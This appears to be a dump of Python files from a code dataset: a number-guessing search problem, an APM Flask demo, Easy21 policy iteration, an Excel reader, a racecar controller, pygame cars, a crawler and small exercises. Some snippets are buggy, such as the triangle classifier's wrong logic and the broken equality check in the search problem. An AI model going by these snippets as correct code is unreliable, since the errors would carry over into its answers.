of\nfinding the secret number.\n'''\n\n# \nPROBLEM_NAME = \"Find_the_Number\"\nPROBLEM_VERSION = \"1.0\"\n# \n\n# \nGUESS_NUM = 0 # Use default, but override if new value supplied\nMAX_NUMBER = 100\n# by the user on the command line.\ntry:\n import sys\n\n arg2 = sys.argv[2] # takes the 2nd argument to be the secret number\n GUESS_NUM = int(arg2)\n arg3 = sys.argv[3] # takes the 2nd argument to be the range\n MAX_NUMBER = int(arg3)\n print(\"A new secret number was successfully read in from the command\"\n \" line. A new maximum number (range limit) was successfully\"\n \" read in from the command line.\")\nexcept:\n print(\"Using default secret number: \" + str(GUESS_NUM)\n + \"and default range\" + str(MAX_NUMBER))\n print(\" (To use a specific number, enter it on the command line, e.g.,\")\n print(\"python3 ../Int_Solv_Client.py heyingge_Find_the_Number 3 10)\")\n\n\n# \n\n# \nclass State:\n def __init__(self, d):\n self.d = d\n\n def __eq__(self, s2):\n if len(self.d) != len(s2.d):\n return false\n for p in (0, len(self.d)):\n if self.d[p] != s2.d[p]: return False\n return True\n\n def __str__(self):\n # Produces a textual description of a state.\n # Might not be needed in normal operation with GUIs.\n return \"question_phase: \" + str(self.d['phase']) + \\\n \"\\nlast_m: \" + str(self.d['last_m']) + \\\n \"\\npossibilities: \" + str(self.d['possibilities'])\n\n def __hash__(self):\n return (self.__str__()).__hash__()\n\n def copy(self):\n # Performs an appropriately deep copy of a state,\n # for use by operators in creating new states.\n news = State({})\n news.d['possibilities'] = self.d['possibilities'][:]\n news.d['phase'] = self.d['phase']\n news.d['last_m'] = self.d['last_m']\n return news\n\n def can_move(self, p, phase):\n '''Tests whether it's legal to do the calculation of (n - k) % m.'''\n try:\n if self.d['phase'] == 0:\n # the value of m must be a prime smaller than the max number\n return isPrimeUnderMax(p, MAX_NUMBER) and phase == 0\n else:\n # the value of k must be smaller than m and greater than 0\n return 0 <= p < self.d['last_m'] and phase == 1\n except Exception as e:\n print(e)\n\n def move(self, k):\n '''Assuming it's legal to make the move, this computes\n the new state resulting from (k, m) which is chosen by user.'''\n news = self.copy() # start with a deep copy.\n if self.d['phase'] == 1:\n m = self.d['last_m']\n if (GUESS_NUM - k) % m == 0:\n for p in self.d['possibilities'][:]:\n if (p - k) % m != 0:\n news.d['possibilities'].remove(p)\n else:\n for p in self.d['possibilities'][:]:\n if (p - k) % m == 0:\n news.d['possibilities'].remove(p)\n news.d['phase'] = 0 # set phase to 0\n else:\n news.d['last_m'] = k # update last_m\n news.d['phase'] = 1 # set phase to 1\n return news # return new state\n\n\ndef goal_test(s):\n '''If there is only one possible answer left, then s is a goal state.'''\n return len(s.d['possibilities']) == 1 and \\\n s.d['possibilities'][0] == GUESS_NUM\n\n\ndef goal_message(s):\n return \"You figure out the secret number!\"\n\n\nclass Operator:\n def __init__(self, name, precond, state_transf):\n self.name = name\n self.precond = precond\n self.state_transf = state_transf\n\n def is_applicable(self, s):\n return self.precond(s)\n\n def apply(self, s):\n return self.state_transf(s)\n\n\n# \n\n# \nINITIAL_DICT = {'possibilities': list(range(MAX_NUMBER + 1)),\n 'phase': 0, 'last_m': None}\nCREATE_INITIAL_STATE = lambda: State(INITIAL_DICT)\n# \n\n# \npossibilities = list(range(MAX_NUMBER + 1))\nOPERATORS = [Operator(\"Is N divisible by \" + str(p) + \" after ...\",\n lambda s, p1=p: s.can_move(p1, 0),\n # The default value construct is needed\n # here to capture the value of p separately\n # in each iteration of the list comp. iteration.\n lambda s, p1=p: s.move(p1))\n for p in possibilities[:]] + \\\n [Operator(\"... subtracting \" + str(p) + \" ?\",\n lambda s, p1=p: s.can_move(p1, 1),\n # The default value construct is needed\n # here to capture the value of p separately\n # in each iteration of the list comp. iteration.\n lambda s, p1=p: s.move(p1))\n for p in possibilities[:]]\n# \n\n# (optional)\nGOAL_TEST = lambda s: goal_test(s)\n# \n\n# (optional)\nGOAL_MESSAGE_FUNCTION = lambda s: goal_message(s)\n\n\n# \n\n# this function returns whether m is a prime number within [0, max]\ndef isPrimeUnderMax(m, max):\n if m < 2 or m > max:\n return False\n for i in range(2, m):\n if m % i == 0:\n return False\n return True\n","sub_path":"a2-starter-code/Find_the_Number/heyingge_Find_the_Number.py","file_name":"heyingge_Find_the_Number.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"158262120","text":"from flask import Flask\nfrom elasticapm.contrib.flask import ElasticAPM\nimport os\nfrom flask import Flask\nfrom elasticapm.contrib.flask import ElasticAPM\n\nflask_app = Flask(__name__)\nflask_app.config['ELASTIC_APM'] = {\n 'SERVICE_NAME': 'Incredible_APM',\n 'SECRET_TOKEN': os.getenv('SECRET_TOKEN'),\n 'SERVER_URL': os.getenv('SERVER_URL'),\n}\napm_client = ElasticAPM(flask_app,logging=True)\n\n@flask_app.route(\"/\")\ndef foo():\n try:\n 1 / 0\n except ZeroDivisionError:\n apm_client.capture_exception()\n\n# Note : that errors and transactions will only be sent to the APM Server if your app is NOT in debug mode!\nif __name__ == \"__main__\":\n flask_app.run(debug=False,port=6060)","sub_path":"elastic-apm/apm-flask-client.py","file_name":"apm-flask-client.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"104945883","text":"from env import Game\nfrom env import Visualizer\nimport copy\nimport numpy as np\nfrom collections import defaultdict\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\n\nepisode_num = 100\ntheta = 0.15\n\nValue_table=np.zeros((10, 21)) # 创建并初始化价值矩阵\nPolicy=np.zeros((10, 21)) # 创建策略矩阵\nprob = 0.1\nred_prob = 1/3 * prob\nblack_prob = 2/3 * prob\n\ndef initial_policy(): #初始化策略矩阵\n for i in range(10):\n for j in range(21):\n Policy[i,j]=np.random.randint(0, 2)\n\ndef update_value_for_one_state(env, action, dealer, player, v_table):\n v = 0\n if action==0:\n for i in range(10): # 如果下一张牌抽到红牌i\n env.set(dealer, player)\n reward = env.hit_value(-i)\n if reward != -1:\n v += red_prob*(reward + v_table[dealer-1,player-i-1])\n else:\n v += red_prob * reward\n\n for j in range(10): #如果下一张牌抽到黑牌j\n env.set(dealer, player)\n reward = env.hit_value(j)\n if reward != -1:\n v += black_prob * (reward + v_table[dealer - 1, player + j - 1])\n else:\n # v += black_prob * (player-11 ) *reward\n v += black_prob * reward\n\n if action == 1:\n for k in range(500): #模拟500次dealer的状态然后取reward的平均值\n env.set(dealer,player)\n _, reward = env.step(action)\n v += reward\n v = v/500\n return v\n\ndef policy_evaluation(env,Value_table):\n while (True):\n delta = 0\n newValue = copy.deepcopy(Value_table)\n for dealer in range(1,11):\n for player in range(1,22): # 对所有状态遍历\n action = Policy[dealer-1, player-1] # 当前状态对应的策略\n newValue[dealer - 1, player - 1]=update_value_for_one_state(env,action, dealer, player, Value_table )\n delta = max(delta, abs(Value_table[dealer - 1, player - 1] - newValue[dealer - 1, player - 1]))\n Value_table = copy.deepcopy(newValue)\n if (delta < theta):\n return delta, Value_table # 收敛了就退出循环\n\ndef policy_improvement(env,dealer, player, Value_table):\n hit = update_value_for_one_state(env,0,dealer, player, Value_table)\n stick = update_value_for_one_state(env,1,dealer, player, Value_table)\n # 比较两个动作谁的价值更高就选择哪个\n if (hit>stick):\n Policy[dealer - 1, player - 1] = 0\n else:\n Policy[dealer - 1, player - 1] = 1\n\nif __name__ == \"__main__\":\n env = Game()\n initial_policy()\n result = []\n for epi in range(episode_num):\n # 策略评估\n pe,Value_table = policy_evaluation(env, Value_table)\n print(pe, epi)\n # 策略提升\n policy_stable = True # 如果对所有的状态策略都没有更新,那么提前结束\n for dealer in range(1, 11):\n for player in range(1, 22):\n old_action = Policy[dealer - 1, player - 1]\n policy_improvement(env, dealer, player, Value_table)\n if (old_action != Policy[dealer - 1, player - 1]): policy_stable=False\n # print(Policy)\n if(policy_stable):\n break\n\n # 计算获胜的概率\n win = 0\n draw = 0 # 平局\n win_rate = 0\n\n for i in range(200000):\n env.reset()\n while (True):\n d, p = env.get_state()\n action = Policy[d - 1, p - 1]\n next, reward = env.step(action)\n\n if (next == 'terminal'):\n if (reward > 0): win += 1\n if (reward == 0): draw += 1\n win_rate = win/200000\n break\n print(epi, win, draw, win_rate)\n result.append(win_rate)\n\n f = open('result', 'a') # 打开test.txt 如果文件不存在,创建该文件。\n f.write(str(epi)+'\\t'+ str(win)+'\\t'+str(draw)+'\\t'+str(win_rate)+'\\n')\n f.close()\n\n\n # 画learning curve\n epi = [i+1 for i in range(episode_num)]\n plt.plot(epi, result)\n plt.xlabel(\"episode\") # x轴的标记\n plt.ylabel(\"win rate\")\n plt.title(\"learning curve\")\n plt.show()\n # 画Value_table图\n V_dic = defaultdict(int)\n for i in range(1, 22):\n for j in range(1, 11):\n state = (j, i)\n V_dic[state, 0] = Value_table[j - 1, i - 1]\n V_dic[state, 1] = -1000\n Visualizer.visualize(V_dic, 'V-value')\n # 画Policy图\n Visualizer.draw2d_array(Policy.transpose(), 'Optimal Policy [hit = 0, stick = 1]', True)\n\n\n","sub_path":"1-Easy21/Policy-iteration/run_policy_iteration.py","file_name":"run_policy_iteration.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"98072623","text":"# Autor: Silvia Ferman Muñoz\n# Programa que lee los lados de un triángulo\n# Tecnica Top-Down\n\n\n# Checar que tipo de TRIANGULO ES\ndef checarTipoTriangulo(A, B, C):\n if (A > B) and (A > C):\n return \"Es un Triangulo Rectángulo\"\n if (A == B) or (B == C) :\n return \"Es un Triangulo Isóceles\"\n if (A == B) and (B == C):\n return \"Es un Triángulo Equilatero\"\n else:\n return \"Estos lados no corresponden a un triángulo\"\n\n\n# Función principal\ndef main():\n A = int(input(\"El lado A vale: \"))\n B = int(input(\"El lado B vale: \"))\n C = int(input(\"El lado C vale: \"))\n\n print(checarTipoTriangulo(A, B, C))\n\n\n# Llama a la función principal\nmain()","sub_path":"Triangulos.py","file_name":"Triangulos.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"650865874","text":"\"\"\"\nCopyright MIT and Harvey Mudd College\nMIT License\nSummer 2020\n\nGrand Prix 2021\n\"\"\"\n\n########################################################################################\n# Imports\n########################################################################################\n\n#from labs.lab4.lab4b import DRIVE_SPEED, LEFT_WINDOW\n#from labs.lab4.lab4b import FRONT_WINDOW\nimport sys\nimport cv2 as cv\nimport numpy as np\nsys.path.insert(0, \"../../library\")\n\nimport racecar_core\nimport racecar_utils as rc_utils\nfrom racecar_utils import ARMarker\nfrom enum import IntEnum\n\n\n########################################################################################\n# Global variables\n########################################################################################\n\nrc = racecar_core.create_racecar()\n\n### LINE FOLLOWING ###\nBLUE_CONE = ((100,150,150), (120,255,255),\"BLUE\") \nRED_CONE = ((170, 150, 150), (10, 255, 255), \"RED\")\nBLUE = ((88, 245, 199), (108, 255, 255), \"BLUE\")\nRED = ((0, 50, 50), (20, 255, 255), \"RED\")\nORANGE = ((7, 172, 78), (27, 192, 158), \"ORANGE\")\nGREEN = ((40, 60, 60), (90, 255, 255), \"GREEN\") \nWHITE = ((90, 20, 200), (115, 60, 255), \"WHITE\")\nORANGEMARKER = ((7, 172, 78), (27, 192, 158), \"ORANGE\")#\nORANGELINE = ((5, 245, 215), (25, 255, 255), \"ORANGE\")\nPURPLEMARKER = ((121, 192, 109), (141, 212, 189), \"PURPLE\")#\nPURPLELINE = ((125, 245, 215), (145, 255, 255), \"PURPLE\")\n\n\n### LIDAR WINDOW ###\nFRONT_WINDOW = (-10, 10)\nRIGHT_FRONT_WINDOW = (40, 50)\nLEFT_FRONT_WINDOW = (310, 320)\n\nLEFT_WINDOW_LIDAR = (-135, -45)\nRIGHT_WINDOW_LIDAR = (45, 135)\nFRONT_WINDOW_LIDAR = (-10, 10)\nBACK_WINDOW_LIDAR = (170, 190)\n\n\n### CROPPED IMAGE ###\nCROP_FLOOR = ((360, 0), (rc.camera.get_height(), rc.camera.get_width()))\n\n\nMIN_CONTOUR_AREA = 30\n\npotential_colors = [BLUE, RED, GREEN]\npotential_colors_markers = [PURPLEMARKER, ORANGEMARKER]\npotential_colors_lines = [PURPLELINE, ORANGELINE]\n\nspeed = 0\nangle = 0\n\nwall_follow_end = False\nfinal_jump_end = False\nelevator_end = False\ncanyon_end = False\n\nrightLine = 0\n\ntime = 0.0\n# Camera values.\ncontour_center = None\ncontour_area = 0\n\ncur_color = None\ncontour_distance = 0.0\n\ncone_counter = 0\nprev_color = None\n\nMIN_CONTOUR_AREA = 650\n\ncurrentColor = None\n\ncounter = 0\n\nfinalJump = False\n\narColor = None\n########################################################################################\n# Functions\n########################################################################################\n\n### State Machine ###\nclass State(IntEnum):\n greenLine = 0\n wallFollow = 1\n purpleLine = 2\n elevator = 3\n cone = 4\n train = 5\n orangePlate = 6\n jump = 7\n\ncurState = State.greenLine\n\n### Initialization ###\ndef start():\n \"\"\"\n This function is run once every time the start button is pressed\n \"\"\"\n # Have the car begin at a stop\n rc.drive.stop()\n\n### State Update ###\ndef update():\n global curState, arColorGlobal\n \"\"\"\n After start() is run, this function is run every frame until the back button\n is pressed\n \"\"\"\n color_image = rc.camera.get_color_image()\n depth_image = rc.camera.get_depth_image()\n\n markers = rc_utils.get_ar_markers(color_image)\n ar_marker: ARMarker = None\n \n\n #Check to see if there are any markers detected and grab the closest marker.\n if len(markers) > 0:\n ar_marker = markers[0]\n ar_marker.detect_colors(color_image, potential_colors_markers)\n arColor = ar_marker.get_color()\n arColorGlobal = arColor\n \n\n #Gets the car distance from marker.\n if ar_marker is not None:\n corners = ar_marker.get_corners()\n centerX = (corners[0][0] + corners[3][0]) //2\n centerY= (corners[0][1] + corners[3][1]) //2 \n marker_distance = depth_image[centerX][centerY]\n #rc_utils.draw_circle(image, center, rc_utils.ColorBGR.yellow.value)\n else: \n marker_distance = None\n\n print(marker_distance)\n \n print(curState)\n if curState == State.greenLine:\n followLine()\n elif curState == State.wallFollow:\n print(\"wallfollowenter\")\n wallFollow()\n if wall_follow_end is True:\n curState = State.greenLine\n elif curState == State.elevator:\n parkInElevator()\n if elevator_end is True:\n curState = State.greenLine\n # elif curState == State.jump:\n # finalStageLineFollowing()\n # if final_jump_end is True:\n # curState = State.greenLine\n\n\n if ar_marker is not None and marker_distance != 0.0: \n if marker_distance < 70:\n if ar_marker.get_id() == 0:\n curState = State.wallFollow\n elif ar_marker.get_id() == 1:\n curState = State.purpleLine\n elif ar_marker.get_id() == 4:\n curState = State.cone\n elif ar_marker.get_id() == 5:\n curState = State.train\n elif ar_marker.get_id() == 6:\n curState = State.orangePlate\n elif ar_marker.get_id() == 8:\n curState = State.jump\n if ar_marker.get_id() == 3:\n curState = State.elevator\n \n rc.drive.set_speed_angle(speed, angle)\n\ndef update_contour(color):\n \"\"\"\n Finds contours in the current color image and uses them to update contour_center\n and contour_area\n \"\"\"\n global contour_center\n global contour_area\n\n image = rc.camera.get_color_image()\n\n if image is None:\n contour_center = None\n contour_area = 0\n else:\n image = rc_utils.crop(image, CROP_FLOOR[0], CROP_FLOOR[1])\n\n contours = rc_utils.find_contours(image, color[0], color[1])\n contour = rc_utils.get_largest_contour(contours, MIN_CONTOUR_AREA)\n\n if contour is not None:\n contour_center = rc_utils.get_contour_center(contour)\n contour_area = rc_utils.get_contour_area(contour)\n rc_utils.draw_contour(image, contour)\n rc_utils.draw_circle(image, contour_center)\n else:\n contour_center = None\n contour_area = 0\n\n### Follows green line - Default state ###\ndef followLine():\n global speed\n global angle\n\n update_contour(GREEN)\n imgX = rc.camera.get_width()\n\n if contour_center is not None:\n angle = rc_utils.remap_range(contour_center[1],0,imgX,-1,1)\n\n speed = 2\n\n### Wall Follow ###\ndef wallFollow():\n global speed\n global angle\n global wall_follow_end\n global contour_center\n\n update_contour(GREEN)\n \n scan = rc.lidar.get_samples()\n color_image = rc.camera.get_color_image()\n depth_image = rc.camera.get_depth_image()\n\n rf_angle, rf_dist = rc_utils.get_lidar_closest_point(scan, RIGHT_FRONT_WINDOW)\n lf_angle, lf_dist = rc_utils.get_lidar_closest_point(scan, LEFT_FRONT_WINDOW)\n front_angle, front_dist = rc_utils.get_lidar_closest_point(scan, FRONT_WINDOW)\n\n markers = rc_utils.get_ar_markers(color_image)\n ar_marker: ARMarker = None\n \n #Check to see if there are any markers detected and grab the closest marker.\n if len(markers) > 0:\n ar_marker = markers[0]\n\n if front_dist < 170:\n if rf_dist > lf_dist:\n dif_dist_r = rc_utils.clamp(rf_dist - lf_dist, 0, 50)\n angle = rc_utils.remap_range(dif_dist_r, 0, 50, 0, 1)\n elif lf_dist > rf_dist:\n dif_dist_l = rc_utils.clamp(lf_dist - rf_dist, 0, 50)\n angle = rc_utils.remap_range(dif_dist_l, 0, 50, 0, -1)\n\n if contour_center is not None and ar_marker is None:\n print(\"end\")\n angle = 0\n wall_follow_end = True\n else:\n angle = 0\n\n speed = 1.5\n\n### Elevator Parking ###\ndef parkInElevator():\n\n global speed, angle, curState, elevator_end\n\n blue = ((90, 100, 100), (120, 255, 255), \"blue\")\n red = ((170, 100, 100), (10, 255, 255), \"red\")\n orange = ((7, 172, 78), (27, 192, 158), \"orange\")\n potential_colors = [blue, red, orange]\n \n color_image = rc.camera.get_color_image()\n depth_image = rc.camera.get_depth_image()\n\n markers = rc_utils.get_ar_markers(color_image)\n\n angle = 0\n if len(markers) > 0:\n \n marker = markers[0]\n\n corners = marker.get_corners()\n centerX = (corners[0][0] + corners[3][0]) //2\n centerY = (corners[0][1] + corners[3][1]) //2 \n \n angle = rc_utils.remap_range(centerY, 0, rc.camera.get_width(), -1, 1) \n angle = rc_utils.clamp(angle, -1, 1)\n\n marker_distance = depth_image[centerX][centerY]\n\n marker.detect_colors(color_image, potential_colors)\n print(marker.get_color())\n if marker_distance > 155 or marker.get_color() == \"blue\":\n speed = 1\n elif marker.get_color == \"orange\":\n speed = 0.4\n elif marker.get_color() == \"red\":\n speed = 0\n \n else:\n elevator_end = True\n\n\n######################################################################################################################################\n\n# def finalStageLineFollowing():\n# global speed\n# global angle\n# global rightLine\n# global image, finalJump, counter\n# global contour_center\n# # global final_jump_end\n# #print(order)\n\n# update_contour(GREEN)\n# image = rc.camera.get_color_image()\n# print(\"RIGHT LINE: \", rightLine)\n# image = rc_utils.crop(image, (0, 3 * rc.camera.get_width() // 4), (rc.camera.get_height(), rc.camera.get_width()))\n\n# markers = rc_utils.get_ar_markers(image)\n# ar_marker: ARMarker = None\n \n# #Check to see if there are any markers detected and grab the closest marker.\n# if len(markers) > 0:\n# ar_marker = markers[0]\n\n# # rc.display.show_color_image(image)\n\n# scan = rc.lidar.get_samples()\n# _, left_dist = rc_utils.get_lidar_closest_point(scan, LEFT_WINDOW_LIDAR)\n# _, right_dist = rc_utils.get_lidar_closest_point(scan, RIGHT_WINDOW_LIDAR)\n# _, front_dist = rc_utils.get_lidar_closest_point(scan, FRONT_WINDOW_LIDAR)\n# _, back_dist = rc_utils.get_lidar_closest_point(scan, BACK_WINDOW_LIDAR)\n\n# update_contour_alt([BLUE], image)\n\n# imgWidth = rc.camera.get_width()\n# halfImgWidth = imgWidth // 2\n\n# quarterImgWidth = rc.camera.get_width() // 4\n# print(f\"Front: {front_dist} Back: {back_dist}\")\n\n# if counter > 18 and ((front_dist < 170 and back_dist > 145) or finalJump == True):\n# print(\"final ramp\")\n# speed = 3\n# angle = 0\n# finalJump = True\n# if finalJump == False:\n# counter += rc.get_delta_time()\n# print(\"Counter: \", counter)\n# if contour_center is not None:\n# print(\"Current Color: \", currentColor)\n\n# centerClamped = rc_utils.clamp(contour_center[1], int(0.75 * quarterImgWidth), quarterImgWidth)\n# angle = rc_utils.remap_range(centerClamped, int(0.75 * quarterImgWidth), quarterImgWidth, -1, 1)\n# print(\"Angle: \", angle)\n# speed = 1\n\n# if contour_center is None:\n# angle = 0.3\n# speed = 1.0\n\n# if contour_center is not None and ar_marker is None:\n# final_jump_end = True\n########################################################################################\n# DO NOT MODIFY: Register start and update and begin execution\n########################################################################################\n\nif __name__ == \"__main__\":\n rc.set_start_update(start, update, None)\n rc.go()\n","sub_path":"labs/final/grand_prix_test.py","file_name":"grand_prix_test.py","file_ext":"py","file_size_in_byte":11469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"520952967","text":"# -*- coding: utf-8 -*-\nimport xlrd, xlwt\nfrom datetime import date, datetime\n\ndef read_excel():\n # 打开文件\n workbook = xlrd.open_workbook(r'E:\\workspace\\pythonmakeauto\\pythonmakeauto\\人员信息.xlsx')\n # 获取所有 sheet\n print(workbook.sheet_names())\n sheet2_name = workbook.sheet_names()[1]\n # 根据 sheet 索引或者名称获取 sheet 内容\n sheet2 = workbook.sheet_by_index(1) # sheet 索引从 0 开始\n sheet2 = workbook.sheet_by_name('Sheet2')\n\n # sheet 的名称,行数,列数\n print(sheet2.name, sheet2.nrows, sheet2.ncols)\n\n\n\n\n\n # 获取整行和整列的值(数组)\n rows = sheet2.row_values(3) # 获取第四行内容\n cols = sheet2.col_values(2) # 获取第三列内容\n\n\n if (sheet2.cell(2,2).ctype == 3):\n date_value = xlrd.xldate_as_tuple(sheet2.cell_value(rows, 3), workbook.datemode)\n date_tmp = date(*date_value[:3]).strftime('%Y/%m/%d')\n print(rows)\n print(date_tmp)\n\n # 获取单元格内容\n print(sheet2.cell(1,0).value)\n print(sheet2.cell_value(1,0))\n print(sheet2.row(1)[0].value)\n\n # 获取单元格内容的数据类型, 0 empty, 1 string, 2 number, 3 date, 4 boolean, 5 error\n print(sheet2.cell(1,0).ctype)\n\nif __name__ == '__main__':\n read_excel()\n","sub_path":"excelPratise.py","file_name":"excelPratise.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"640118816","text":"import pygame\r\nimport time\r\nfrom .env import *\r\nimport random\r\n\r\nclass Car(pygame.sprite.Sprite):\r\n def __init__(self, y,distance):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image = pygame.Surface(car_size)\r\n self.rect = self.image.get_rect()\r\n self.rect.left,self.rect.top = distance, y\r\n self.status = True\r\n self.velocity = 0\r\n self.distance = distance\r\n self.car_no = 0\r\n self.car_info = {}\r\n self.coin_num = 0\r\n self.max_vel = random.randint(10, 16)\r\n\r\n def speedUp(self):\r\n self.velocity += 0.01*(self.velocity**0.6)+0.04\r\n\r\n def brakeDown(self):\r\n self.velocity -= 0.2\r\n\r\n def slowDown(self):\r\n if self.velocity > 1:\r\n self.velocity -= 0.05\r\n elif 0 <= self.velocity < 0.9:\r\n self.velocity += 0.3\r\n def moveRight(self):\r\n self.rect.centery += 3\r\n\r\n def moveLeft(self):\r\n self.rect.centery -= 3\r\n\r\n def keep_in_screen(self):\r\n if self.rect.left < -250 or self.rect.right > 1300 or self.rect.top < 100:\r\n self.kill()\r\n\r\n def get_info(self):\r\n\r\n self.car_info = {\"id\": self.car_no,\r\n \"pos\": (self.rect.left, self.rect.top),\r\n \"distance\": self.distance,\r\n \"velocity\": self.velocity,\r\n \"coin_num\": self.coin_num}\r\n return self.car_info\r\n\r\nclass UserCar(Car):\r\n def __init__(self, y,distance,user_no):\r\n Car.__init__(self, y,distance)\r\n self.car_no = user_no\r\n self.image_list = [pygame.transform.scale(pygame.image.load(\r\n path.join(IMAGE_DIR, USER_IMAGE[self.car_no][0])), car_size), pygame.transform.scale(pygame.image.load(\r\n path.join(IMAGE_DIR, USER_IMAGE[self.car_no][1])), car_size)]\r\n\r\n self.image = self.image_list[0]\r\n self.image = self.image.convert_alpha()\r\n self.lastUpdateTime = time.time()\r\n self.coin_num = 0\r\n self.max_vel = 15\r\n\r\n def update(self, control_list):\r\n if self.status:\r\n self.handleKeyEvent(control_list)\r\n self.distance += self.velocity\r\n self.keep_in_screen()\r\n else:\r\n pass\r\n\r\n\r\n def keep_in_screen(self):\r\n if self.rect.top < 100 or self.rect.bottom > 550:\r\n self.status = False\r\n if self.velocity > self.max_vel:\r\n self.velocity = self.max_vel\r\n elif self.velocity < 0:\r\n self.velocity = 0\r\n\r\n def handleKeyEvent(self, control_list: list):\r\n if control_list == None:\r\n return True\r\n if LEFT_cmd in control_list:\r\n self.moveLeft()\r\n self.max_vel = 14.5\r\n\r\n if RIGHT_cmd in control_list:\r\n self.moveRight()\r\n self.max_vel = 14.5\r\n if LEFT_cmd not in control_list and RIGHT_cmd not in control_list:\r\n self.max_vel = 15\r\n if SPEED_cmd in control_list:\r\n self.speedUp()\r\n elif BRAKE_cmd in control_list:\r\n self.brakeDown()\r\n else:\r\n self.slowDown()\r\n\r\nclass ComputerCar(Car):\r\n\r\n def __init__(self, y,distance,x):\r\n Car.__init__(self,y,distance)\r\n self.image_list = [pygame.transform.scale(pygame.image.load(\r\n path.join(IMAGE_DIR, COMPUTER_CAR_IMAGE[0])), car_size),pygame.transform.scale(pygame.image.load(\r\n path.join(IMAGE_DIR, COMPUTER_CAR_IMAGE[1])), (32,40))]\r\n self.image = self.image_list[0]\r\n self.rect.left,self.rect.top = (x,y)\r\n self.image = self.image.convert_alpha()\r\n self.velocity = random.randint(8,12)\r\n self.car_no = random.randrange(101, 200)\r\n self.distance = distance\r\n self.action = None\r\n\r\n def update(self,cars):\r\n if self.status:\r\n for car in cars:\r\n self.detect_other_cars(car)\r\n if self.action == \"stop\":\r\n self.brakeDown()\r\n break\r\n elif self.action == \"continue\":\r\n self.speedUp()\r\n else:\r\n pass\r\n self.distance += self.velocity\r\n if self.velocity < 0:\r\n self.velocity = 0\r\n if self.velocity > self.max_vel:\r\n self.velocity = self.max_vel\r\n pass\r\n else:\r\n pass\r\n self.keep_in_screen()\r\n\r\n def detect_other_cars(self, car):\r\n if abs(self.rect.centery - car.rect.centery) < 40:\r\n distance = car.rect.centerx - self.rect.centerx\r\n if 400 > distance > 0:\r\n self.action = \"stop\"\r\n else:\r\n self.action = \"continue\"\r\n\r\nclass Camera():\r\n def __init__(self):\r\n self.position = 500\r\n self.velocity = 0\r\n\r\n def update(self,car_velocity):\r\n self.revise_velocity(car_velocity)\r\n self.position += self.velocity\r\n\r\n def revise_velocity(self,car_velocity):\r\n if car_velocity >= 13:\r\n self.velocity = car_velocity-0.5\r\n\r\n elif car_velocity == 0:\r\n self.velocity = 1\r\n else:\r\n if self.velocity < car_velocity:\r\n self.velocity += 0.05\r\n elif self.velocity > car_velocity+1:\r\n self.velocity -= 0.05\r\n else:\r\n pass","sub_path":"game/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"310500732","text":"\r\ndef bubbleSort(arr):\r\n\tn = len(arr)\r\n\r\n \r\n\tfor i in range(n-1):\r\n\t\r\n\t\tfor j in range(0, n-i-1):\r\n\r\n\t\t\tif arr[j] > arr[j+1] :\r\n\t\t\t\tarr[j], arr[j+1] = arr[j+1], arr[j]\r\n\r\nn = int(input(\"enter the size of list=\"))\r\narr=[]\r\nfor i in range(n):\r\n x=int(input(\"enter item=\"))\r\n arr.append(x)\r\n\r\nbubbleSort(arr)\r\n\r\nprint (\"Sorted array list is:\")\r\nfor i in range(len(arr)):\r\n\tprint (\"%d\" %arr[i]),\r\n","sub_path":"python_special/bubble.py","file_name":"bubble.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"457591402","text":"# coding:utf8\nfrom baidu_baike import html_downloader\nfrom baidu_baike import html_outputer\nfrom baidu_baike import url_manager\nfrom baidu_baike import html_parser\n\n\nclass BaikeMain(object):\n def __init__(self):\n self.urls = url_manager.UrlManager()\n self.downloader = html_downloader.HtmlDownload()\n self.parser = html_parser.HtmlParser()\n self.outputer = html_outputer.HtmlOutputer()\n\n def craw(self, root_url):\n count = 1\n self.urls.add_new_url(root_url)\n while self.urls.has_new_url():\n try:\n new_url = self.urls.get_new_url()\n print(\"正在爬取第 %d 页面:%s\" % (count, new_url))\n html_content = self.downloader.download(new_url)\n new_urls, new_data = self.parser.parse(new_url, html_content)\n self.urls.add_new_urls(new_urls)\n self.outputer.collect_data(new_data)\n if count == 10:\n break\n count += 1\n except:\n print(\"爬取页面失败!\")\n\n print(\"\\n页面爬取结束!\")\n self.outputer.output_html()\n\n\nif __name__ == \"__main__\":\n root_url = \"http://baike.baidu.com/item/Python\"\n baike_main = BaikeMain()\n baike_main.craw(root_url)\n","sub_path":"baidu_baike/baike_main.py","file_name":"baike_main.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"371776234","text":"import argparse\nimport logging\n\nlog_format = '[%(asctime)s][%(levelname)8s]: %(message)s'\ndate_format = '%I:%M:%S%p'\n\n# formatter = logging.Formatter(fmt=log_format,\n# datefmt=date_format)\n\nlogging.basicConfig(level=logging.DEBUG,\n format=log_format,\n datefmt=date_format)\n\n\nclass FindSecondComponent(object):\n\n def __init__(self):\n self.log = logging.getLogger(__name__)\n self.args = None\n self.target_list = None\n self.template_list = None\n self.first_component = None\n\n def __call__(self, *args, **kwargs):\n self.log.info(\"hello! this is a log message\")\n self.args = self._get_args()\n print(self.args)\n\n def spbina(self):\n pass\n\n @staticmethod\n def _get_args(arguments=None):\n parser = argparse.ArgumentParser(\n description=\"Finds secondary component of binary stars\")\n\n # 